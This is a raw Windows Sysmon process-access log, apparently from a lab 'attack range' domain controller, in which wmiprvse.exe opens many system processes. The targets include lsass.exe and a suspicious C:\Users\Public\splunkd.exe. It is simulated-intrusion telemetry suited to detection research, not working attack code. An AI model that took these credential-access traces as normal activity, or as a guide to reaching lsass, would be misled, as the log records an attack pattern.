15:59:40.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026942Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026941Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026940Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026939Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026938Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026937Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026936Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026935Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026934Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026933Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026932Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026931Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026930Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026929Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026928Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026927Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026926Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026925Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026924Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026923Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 